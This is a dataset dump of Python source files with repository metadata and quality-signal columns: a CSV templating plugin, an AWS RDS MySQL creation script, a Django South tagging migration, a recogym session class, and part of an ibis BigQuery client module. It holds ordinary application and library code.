hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
294ddecc4d289926d35a18bd81582fdedcf038ee | 2,999 | py | Python | optional-plugins/CSVPlugin/CSVContext.py | owlfish/pubtal | fb20a0acf2769b2c06012b65bd462f02da12bd1c | [
"BSD-3-Clause"
] | null | null | null | optional-plugins/CSVPlugin/CSVContext.py | owlfish/pubtal | fb20a0acf2769b2c06012b65bd462f02da12bd1c | [
"BSD-3-Clause"
] | null | null | null | optional-plugins/CSVPlugin/CSVContext.py | owlfish/pubtal | fb20a0acf2769b2c06012b65bd462f02da12bd1c | [
"BSD-3-Clause"
] | null | null | null | import ASV
from simpletal import simpleTAL, simpleTALES
try:
import logging
except:
import InfoLogging as logging
import codecs
class ColumnSorter:
    """cmp-style comparator that orders CSV rows by one or more named columns.

    ``columnList`` is a sequence of ``(columnName, translationMap)`` pairs.
    A ``translationMap`` of None compares raw column values; otherwise the
    column value is looked up in the map before comparison.
    """

    def __init__(self, columnList):
        self.columnList = columnList
        self.log = logging.getLogger('ColumnSorter')

    def setup(self, fieldNames):
        """Resolve configured column names against the CSV header row.

        Raises ValueError when a configured column is not in ``fieldNames``.
        """
        mapList = []
        for columnName, translationMap in self.columnList:
            try:
                colNum = fieldNames.index(columnName)
            except ValueError as e:
                # Bug fix: the original logged an undefined name ``name``
                # here, raising NameError instead of reporting the column.
                self.log.error("No such column name as %s" % columnName)
                raise e
            mapList.append((colNum, translationMap))
        self.mapList = mapList

    def sort(self, row1, row2):
        """Compare two rows; returns -1, 0 or 1 (first difference wins)."""
        result = 0
        for colNum, map in self.mapList:
            result = self.doSort(row1, row2, colNum, map)
            if result != 0:
                return result
        return result

    def doSort(self, row1, row2, colNum, map):
        """Compare one column of two rows, translating via ``map`` if given.

        A value missing from ``map`` is treated as lower than any present one.
        """
        if map is None:
            col1 = row1[colNum]
            col2 = row2[colNum]
        else:
            try:
                col1 = map[row1[colNum]]
            except KeyError:
                self.log.warn(
                    "No key found for key %s - assuming low value" % row1[colNum])
                return -1
            try:
                col2 = map[row2[colNum]]
            except KeyError:
                # Bug fix: the original interpolated row1's value here even
                # though row2's value is the one that was missing.
                self.log.warn(
                    "No key found for key %s - assuming low value" % row2[colNum])
                return 1
        if col1 < col2:
            return -1
        if col1 == col2:
            return 0
        return 1
class CsvContextCreator:
    """Load a CSV file (via the external ASV module) and turn its rows into
    SimpleTALES context dictionaries.

    NOTE(review): this is Python-2-only code — it uses the ``except E, e``
    syntax, a cmp-style ``list.sort`` argument, and ``unicode``.
    """

    def __init__ (self, fileName, fileCodec):
        # fileCodec is a codecs-style decode callable; it returns a
        # (decoded_text, length) pair and is applied per cell below.
        self.log = logging.getLogger ("CSVTemplate.CsvContextCreator")
        self.csvData = ASV.ASV()
        self.csvData.input_from_file(fileName, ASV.CSV(), has_field_names = 1)
        self.fieldNames = self.csvData.get_field_names()
        self.conv = fileCodec

    def getContextMap (self, sorter=None):
        """Return the CSV rows as a list of {fieldName: value} dicts.

        ``sorter`` is an optional ColumnSorter-like object: ``setup`` is
        called with the field names and ``sort`` is used as a cmp function.
        Empty cells are omitted from each row's dict.
        """
        orderList = []
        for row in self.csvData:
            orderList.append (row)
        if (sorter is not None):
            sorter.setup (self.fieldNames)
            try:
                # Python 2 cmp-style sort; sorter.sort returns -1/0/1.
                orderList.sort (sorter.sort)
            except Exception, e:
                self.log.error ("Exception occured executing sorter: " + str (e))
                raise e
        contextList = []
        for row in orderList:
            rowMap = {}
            colCount = 0
            for col in row:
                if (col != ""):
                    # Decode the raw cell; [0] drops the consumed-length part
                    # of the codec's (text, length) return value.
                    rowMap[self.fieldNames[colCount]] = self.conv(col)[0]
                colCount += 1
            contextList.append (rowMap)
        return contextList

    def getRawData (self):
        """Return the whole CSV content as a unicode string (Python 2)."""
        return unicode (self.csvData)
class CSVTemplateExpander:
    """Expand a SimpleTAL HTML template against the rows of a CSV file.

    The rows are exposed to the template as a list of dictionaries bound
    to ``name`` (default "csvList").  The compiled template is cached on
    first use.
    """

    def __init__ (self, sourceFile, name="csvList", fileCodec=None):
        # Bug fix: CsvContextCreator requires a fileCodec argument, but the
        # original passed only sourceFile, so construction always raised
        # TypeError.  Default to a UTF-8 decoder (codecs is imported at the
        # top of this module); callers may still supply their own codec.
        if fileCodec is None:
            fileCodec = codecs.getdecoder('utf-8')
        self.contextFactory = CsvContextCreator (sourceFile, fileCodec)
        self.name = name
        self.template = None

    def expandTemplate (self, templateName, outputName, additionalContext = None, sorter=None):
        """Compile ``templateName`` (cached) and write its expansion to
        ``outputName``.

        ``additionalContext`` is an optional (name, value) pair added to the
        template context; ``sorter`` optionally orders the CSV rows.
        """
        context = simpleTALES.Context()
        context.addGlobal (self.name, self.contextFactory.getContextMap (sorter))
        if (additionalContext is not None):
            context.addGlobal (additionalContext[0], additionalContext[1])
        if (self.template is None):
            templateFile = open (templateName, 'r')
            try:
                self.template = simpleTAL.compileHTMLTemplate (templateFile)
            finally:
                # Close the template file even if compilation fails.
                templateFile.close()
        outputFile = open (outputName, 'w')
        try:
            self.template.expand (context, outputFile)
        finally:
            outputFile.close()
| 26.307018 | 92 | 0.686896 | 370 | 2,999 | 5.518919 | 0.289189 | 0.020568 | 0.015671 | 0.023506 | 0.123408 | 0.096474 | 0.080313 | 0.080313 | 0.080313 | 0.080313 | 0 | 0.014614 | 0.2014 | 2,999 | 113 | 93 | 26.539823 | 0.837996 | 0 | 0 | 0.177083 | 0 | 0 | 0.066355 | 0.00967 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052083 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2954339ee63d8f3aeb46e217258769ecc01fa43c | 1,444 | py | Python | new_rdsmysql.py | AdminTurnedDevOps/AWS_Solutions_Architect_Python | 5389f8c9dfbda7b0b49a94a93e9b070420ca9ece | [
"MIT"
] | 30 | 2019-01-13T20:14:07.000Z | 2022-02-06T15:08:01.000Z | new_rdsmysql.py | AdminTurnedDevOps/AWS_Solutions_Architect_Python | 5389f8c9dfbda7b0b49a94a93e9b070420ca9ece | [
"MIT"
] | 1 | 2019-01-13T23:52:39.000Z | 2019-01-14T14:39:45.000Z | new_rdsmysql.py | AdminTurnedDevOps/AWS_Solutions_Architect_Python | 5389f8c9dfbda7b0b49a94a93e9b070420ca9ece | [
"MIT"
] | 26 | 2019-01-13T21:32:23.000Z | 2022-03-20T05:19:03.000Z | import boto3
import sys
import time
import logging
import getpass
def new_rdsmysql(dbname, instanceID, storage, dbInstancetype, dbusername):
    """Create a Multi-AZ MySQL 5.7 RDS instance.

    Prompts interactively for the master password and aborts without
    calling AWS when the password is shorter than 10 characters.
    Errors from the AWS API are logged and printed, not re-raised.
    """
    masterPass = getpass.getpass('DBMasterPassword: ')
    if len(masterPass) < 10:
        logging.warning('Password is not at least 10 characters. Please try again')
        time.sleep(5)
        # Bug fix: the original evaluated the bare name ``exit`` (a no-op
        # expression), so the too-short password was sent to AWS anyway.
        return

    try:
        rds_instance = boto3.client('rds')
        create_instance = rds_instance.create_db_instance(
            DBName=dbname,
            DBInstanceIdentifier=instanceID,
            AllocatedStorage=int(storage),
            DBInstanceClass=dbInstancetype,
            Engine='mysql',
            MasterUsername=dbusername,
            MasterUserPassword=str(masterPass),
            MultiAZ=True,
            EngineVersion='5.7.23',
            AutoMinorVersionUpgrade=False,
            LicenseModel='general-public-license',
            PubliclyAccessible=False,
            Tags=[
                {
                    'Key': 'Name',
                    'Value': dbname
                }
            ]
        )
        print(create_instance)
    except Exception as e:
        logging.warning('An error has occured')
        print(e)
# Script entry point: read positional CLI arguments.  No validation is
# performed — a missing argument raises IndexError.
dbname = sys.argv[1]          # DBName for the new instance
instanceID = sys.argv[2]      # DBInstanceIdentifier
storage = sys.argv[3]         # AllocatedStorage (numeric string, int()'d later)
dbInstancetype = sys.argv[4]  # DBInstanceClass, e.g. db.t2.micro
dbusername = sys.argv[5]      # MasterUsername
new_rdsmysql(dbname, instanceID, storage, dbInstancetype, dbusername) | 27.769231 | 83 | 0.587258 | 134 | 1,444 | 6.268657 | 0.58209 | 0.041667 | 0.040476 | 0.064286 | 0.138095 | 0.138095 | 0.138095 | 0 | 0 | 0 | 0 | 0.01641 | 0.324792 | 1,444 | 52 | 84 | 27.769231 | 0.845128 | 0 | 0 | 0 | 0 | 0 | 0.09827 | 0.015225 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0.111111 | 0.111111 | 0 | 0.133333 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
29560939d9082f0d01fcc95be50270dfe0f453ac | 4,265 | py | Python | tunobase/tagging/migrations/0001_initial.py | unomena/tunobase-core | fd24e378c87407131805fa56ade8669fceec8dfa | [
"BSD-3-Clause"
] | null | null | null | tunobase/tagging/migrations/0001_initial.py | unomena/tunobase-core | fd24e378c87407131805fa56ade8669fceec8dfa | [
"BSD-3-Clause"
] | null | null | null | tunobase/tagging/migrations/0001_initial.py | unomena/tunobase-core | fd24e378c87407131805fa56ade8669fceec8dfa | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration creating the ``Tag`` and ``ContentObjectTag``
    tables for the tagging app (auto-generated by South's schemamigration).
    """

    def forwards(self, orm):
        """Apply the migration: create both tables and the unique constraint."""
        # Adding model 'Tag'
        db.create_table(u'tagging_tag', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('title', self.gf('django.db.models.fields.CharField')(max_length=32, db_index=True)),
            ('description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'], null=True, blank=True)),
        ))
        db.send_create_signal(u'tagging', ['Tag'])

        # Adding unique constraint on 'Tag', fields ['title', 'site']
        db.create_unique(u'tagging_tag', ['title', 'site_id'])

        # Adding model 'ContentObjectTag'
        db.create_table(u'tagging_contentobjecttag', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('content_type', self.gf('django.db.models.fields.related.ForeignKey')(related_name='content_type_set_for_contentobjecttag', to=orm['contenttypes.ContentType'])),
            ('object_pk', self.gf('django.db.models.fields.PositiveIntegerField')()),
            ('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'])),
            ('tag', self.gf('django.db.models.fields.related.ForeignKey')(related_name='content_object_tags', to=orm['tagging.Tag'])),
        ))
        db.send_create_signal(u'tagging', ['ContentObjectTag'])

    def backwards(self, orm):
        """Revert the migration: drop the constraint first, then both tables."""
        # Removing unique constraint on 'Tag', fields ['title', 'site']
        db.delete_unique(u'tagging_tag', ['title', 'site_id'])

        # Deleting model 'Tag'
        db.delete_table(u'tagging_tag')

        # Deleting model 'ContentObjectTag'
        db.delete_table(u'tagging_contentobjecttag')

    # Frozen ORM state South uses to reconstruct the models at migration time.
    models = {
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'sites.site': {
            'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'tagging.contentobjecttag': {
            'Meta': {'object_name': 'ContentObjectTag'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_contentobjecttag'", 'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_pk': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
            'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_object_tags'", 'to': u"orm['tagging.Tag']"})
        },
        u'tagging.tag': {
            'Meta': {'unique_together': "[('title', 'site')]", 'object_name': 'Tag'},
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'})
        }
    }
complete_apps = ['tagging'] | 56.118421 | 182 | 0.597655 | 485 | 4,265 | 5.115464 | 0.164948 | 0.083837 | 0.141072 | 0.201532 | 0.660621 | 0.626763 | 0.566304 | 0.530028 | 0.464329 | 0.410318 | 0 | 0.005795 | 0.190856 | 4,265 | 76 | 183 | 56.118421 | 0.713127 | 0.058382 | 0 | 0.140351 | 0 | 0 | 0.499875 | 0.296333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035088 | false | 0 | 0.070175 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2957082f2761f3302a5b658af0d68aab4daff24f | 1,004 | py | Python | recogym/envs/session.py | philomenec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 413 | 2018-09-18T17:49:44.000Z | 2022-03-23T12:25:41.000Z | recogym/envs/session.py | aliang-rec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 15 | 2018-11-08T17:04:21.000Z | 2021-11-30T19:20:27.000Z | recogym/envs/session.py | aliang-rec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 81 | 2018-09-22T02:28:55.000Z | 2022-03-30T14:03:01.000Z | class Session(list):
"""Abstract Session class"""
def to_strings(self, user_id, session_id):
"""represent session as list of strings (one per event)"""
user_id, session_id = str(user_id), str(session_id)
session_type = self.get_type()
strings = []
for event, product in self:
columns = [user_id, session_type, session_id, event, str(product)]
strings.append(','.join(columns))
return strings
def get_type(self):
raise NotImplemented
class OrganicSessions(Session):
    """Session of organic events; each event is stored as a dict with keys
    't' (time), 'u' (user), 'z' (event type) and 'v' (product).
    """

    def __init__(self):
        super(OrganicSessions, self).__init__()

    def next(self, context, product):
        """Record a pageview of ``product`` at the context's time and user."""
        self.append(
            {
                't': context.time(),
                'u': context.user(),
                'z': 'pageview',
                'v': product
            }
        )

    def get_type(self):
        return 'organic'

    def get_views(self):
        """Return the products of all pageview events in this session.

        Bug fix: events are dicts, but the original unpacked each event as
        a 4-tuple (``for _, _, e, p in self``), which iterates the dict's
        *keys* ('t', 'u', 'z', 'v'); 'z' never equals 'pageview', so the
        method always returned an empty list.
        """
        return [event['v'] for event in self if event['z'] == 'pageview']
| 27.135135 | 78 | 0.548805 | 113 | 1,004 | 4.654867 | 0.389381 | 0.045627 | 0.074144 | 0.057034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.330677 | 1,004 | 36 | 79 | 27.888889 | 0.782738 | 0.074701 | 0 | 0.074074 | 0 | 0 | 0.030501 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0.074074 | 0.407407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
295d64816bed48df8774a68b70c332508540215b | 12,525 | py | Python | ibis/bigquery/client.py | tswast/ibis | 2f6d47e4c33cefd7ea1d679bb1d9253c2245993b | [
"Apache-2.0"
] | null | null | null | ibis/bigquery/client.py | tswast/ibis | 2f6d47e4c33cefd7ea1d679bb1d9253c2245993b | [
"Apache-2.0"
] | null | null | null | ibis/bigquery/client.py | tswast/ibis | 2f6d47e4c33cefd7ea1d679bb1d9253c2245993b | [
"Apache-2.0"
] | null | null | null | import regex as re
import time
import collections
import datetime
import six
import pandas as pd
import google.cloud.bigquery as bq
from multipledispatch import Dispatcher
import ibis
import ibis.common as com
import ibis.expr.operations as ops
import ibis.expr.types as ir
import ibis.expr.schema as sch
import ibis.expr.datatypes as dt
import ibis.expr.lineage as lin
from ibis.compat import parse_version
from ibis.client import Database, Query, SQLClient
from ibis.bigquery import compiler as comp
from google.api.core.exceptions import BadRequest
# Pseudo-column BigQuery exposes on ingestion-time partitioned tables.
NATIVE_PARTITION_COL = '_PARTITIONTIME'
def _ensure_split(table_id, dataset_id):
split = table_id.split('.')
if len(split) > 1:
assert len(split) == 2
if dataset_id:
raise ValueError(
"Can't pass a fully qualified table name *AND* a dataset_id"
)
(dataset_id, table_id) = split
return (table_id, dataset_id)
# ibis type name -> BigQuery standard-SQL type name, used when binding
# query parameters (see bq_param_array below).
_IBIS_TYPE_TO_DTYPE = {
    'string': 'STRING',
    'int64': 'INT64',
    'double': 'FLOAT64',
    'boolean': 'BOOL',
    'timestamp': 'TIMESTAMP',
    'date': 'DATE',
}

# BigQuery standard-SQL type name -> ibis dtype.
_DTYPE_TO_IBIS_TYPE = {
    'INT64': dt.int64,
    'FLOAT64': dt.double,
    'BOOL': dt.boolean,
    'STRING': dt.string,
    'DATE': dt.date,
    # FIXME: enforce no tz info
    'DATETIME': dt.timestamp,
    'TIME': dt.time,
    'TIMESTAMP': dt.timestamp,
    'BYTES': dt.binary,
}

# Legacy-SQL type names normalized to their standard-SQL equivalents.
_LEGACY_TO_STANDARD = {
    'INTEGER': 'INT64',
    'FLOAT': 'FLOAT64',
    'BOOLEAN': 'BOOL',
}
@dt.dtype.register(bq.schema.SchemaField)
def bigquery_field_to_ibis_dtype(field):
    """Convert a BigQuery SchemaField into the corresponding ibis dtype.

    RECORD fields become Struct types (converted recursively); legacy
    type names are normalized to standard SQL first; REPEATED fields are
    wrapped in an Array type.
    """
    field_type = field.field_type
    if field_type == 'RECORD':
        subfields = field.fields
        assert subfields
        ibis_type = dt.Struct(
            [subfield.name for subfield in subfields],
            [dt.dtype(subfield) for subfield in subfields],
        )
    else:
        standard_name = _LEGACY_TO_STANDARD.get(field_type, field_type)
        ibis_type = _DTYPE_TO_IBIS_TYPE.get(standard_name, standard_name)
    if field.mode == 'REPEATED':
        ibis_type = dt.Array(ibis_type)
    return ibis_type
@sch.infer.register(bq.table.Table)
def bigquery_schema(table):
    """Infer an ibis schema from a BigQuery table object.

    A synthetic _PARTITIONTIME column is appended for partitioned
    tables; BadRequest from list_partitions (non-partitionable table)
    is treated as "not partitioned".
    """
    pairs = [(field.name, dt.dtype(field)) for field in table.schema]
    try:
        partitions = table.list_partitions()
    except BadRequest:
        partitions = None
    if partitions:
        pairs.append((NATIVE_PARTITION_COL, dt.timestamp))
    return sch.schema(pairs)
class BigQueryCursor(object):
    """Cursor to allow the BigQuery client to reuse machinery in
    ibis/client.py.

    Wraps a completed synchronous query object, exposing a minimal
    DB-API-like surface (fetchall, columns, context manager).
    """

    def __init__(self, query):
        self.query = query

    def fetchall(self):
        """Materialize every row of the underlying query as a list."""
        return [row for row in self.query.fetch_data()]

    @property
    def columns(self):
        """Column names in schema order."""
        return [schema_field.name for schema_field in self.query.schema]

    def __enter__(self):
        # For compatibility when constructed from Query.execute()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Nothing to release; exceptions propagate.
        return None
def _find_scalar_parameter(expr):
    """:func:`~ibis.expr.lineage.traverse` function to find all
    :class:`~ibis.expr.types.ScalarParameter` instances and yield the
    operation and the parent expression's resolved name.

    Parameters
    ----------
    expr : ibis.expr.types.Expr

    Returns
    -------
    Tuple[bool, object]
        Always proceeds with traversal; the payload is the
        ``(op, name)`` pair for scalar parameters and None otherwise.
    """
    node = expr.op()
    if isinstance(node, ops.ScalarParameter):
        return lin.proceed, (node, expr.get_name())
    return lin.proceed, None
class BigQueryQuery(Query):
    """Synchronous query against BigQuery, with scalar-parameter binding."""

    def __init__(self, client, ddl, query_parameters=None):
        super(BigQueryQuery, self).__init__(client, ddl)

        # self.expr comes from the parent class
        # Map each ScalarParameter op found in the expression tree to the
        # resolved name it carries in the compiled SQL.
        query_parameter_names = dict(
            lin.traverse(_find_scalar_parameter, self.expr))
        # Convert user-supplied parameter values into BigQuery
        # QueryParameter objects via the bigquery_param dispatcher.
        self.query_parameters = [
            bigquery_param(
                param.to_expr().name(query_parameter_names[param]), value
            ) for param, value in (query_parameters or {}).items()
        ]

    def _fetch(self, cursor):
        """Build a DataFrame from the cursor and coerce it to the schema."""
        df = pd.DataFrame(cursor.fetchall(), columns=cursor.columns)
        return self.schema().apply_to(df)

    def execute(self):
        """Run the compiled SQL and return the wrapped result."""
        # synchronous by default
        with self.client._execute(
            self.compiled_sql,
            results=True,
            query_parameters=self.query_parameters
        ) as cur:
            result = self._fetch(cur)

        return self._wrap_result(result)
class BigQueryAPIProxy(object):
    """Thin wrapper around the google-cloud-bigquery client object."""

    def __init__(self, project_id):
        self._client = bq.Client(project_id)

    @property
    def client(self):
        # The underlying google.cloud.bigquery Client.
        return self._client

    @property
    def project_id(self):
        return self.client.project

    def get_datasets(self):
        """List all datasets in the project."""
        return list(self.client.list_datasets())

    def get_dataset(self, dataset_id):
        return self.client.dataset(dataset_id)

    def get_table(self, table_id, dataset_id, reload=True):
        """Return a table reference; reload fetches its metadata from the API."""
        (table_id, dataset_id) = _ensure_split(table_id, dataset_id)
        table = self.client.dataset(dataset_id).table(table_id)
        if reload:
            table.reload()
        return table

    def get_schema(self, table_id, dataset_id):
        return self.get_table(table_id, dataset_id).schema

    def run_sync_query(self, stmt):
        """Run ``stmt`` as standard SQL and block until the job finishes."""
        query = self.client.run_sync_query(stmt)
        query.use_legacy_sql = False
        query.run()
        # run_sync_query is not really synchronous: there's a timeout
        # Poll the job until completion (0.1 s busy-wait).
        while not query.job.done():
            query.job.reload()
            time.sleep(0.1)
        return query
class BigQueryDatabase(Database):
    """Database wrapper for a BigQuery dataset; no backend-specific behavior."""
    pass
# Multiple-dispatch converter from an (ibis parameter expression, Python
# value) pair to the matching google-cloud-bigquery QueryParameter object.
bigquery_param = Dispatcher('bigquery_param')


@bigquery_param.register(ir.StructScalar, collections.OrderedDict)
def bq_param_struct(param, value):
    # Convert each struct field recursively, preserving field names.
    field_params = [bigquery_param(param[k], v) for k, v in value.items()]
    return bq.StructQueryParameter(param.get_name(), *field_params)


@bigquery_param.register(ir.ArrayValue, list)
def bq_param_array(param, value):
    param_type = param.type()
    assert isinstance(param_type, dt.Array), str(param_type)

    try:
        # Element type must map onto a BigQuery standard-SQL type.
        bigquery_type = _IBIS_TYPE_TO_DTYPE[str(param_type.value_type)]
    except KeyError:
        raise com.UnsupportedBackendType(param_type)
    else:
        return bq.ArrayQueryParameter(param.get_name(), bigquery_type, value)


@bigquery_param.register(
    ir.TimestampScalar,
    six.string_types + (datetime.datetime, datetime.date)
)
def bq_param_timestamp(param, value):
    assert isinstance(param.type(), dt.Timestamp)

    # TODO(phillipc): Not sure if this is the correct way to do this.
    timestamp_value = pd.Timestamp(value, tz='UTC').to_pydatetime()
    return bq.ScalarQueryParameter(
        param.get_name(), 'TIMESTAMP', timestamp_value)


@bigquery_param.register(ir.StringScalar, six.string_types)
def bq_param_string(param, value):
    return bq.ScalarQueryParameter(param.get_name(), 'STRING', value)


@bigquery_param.register(ir.IntegerScalar, six.integer_types)
def bq_param_integer(param, value):
    return bq.ScalarQueryParameter(param.get_name(), 'INT64', value)


@bigquery_param.register(ir.FloatingScalar, float)
def bq_param_double(param, value):
    return bq.ScalarQueryParameter(param.get_name(), 'FLOAT64', value)


@bigquery_param.register(ir.BooleanScalar, bool)
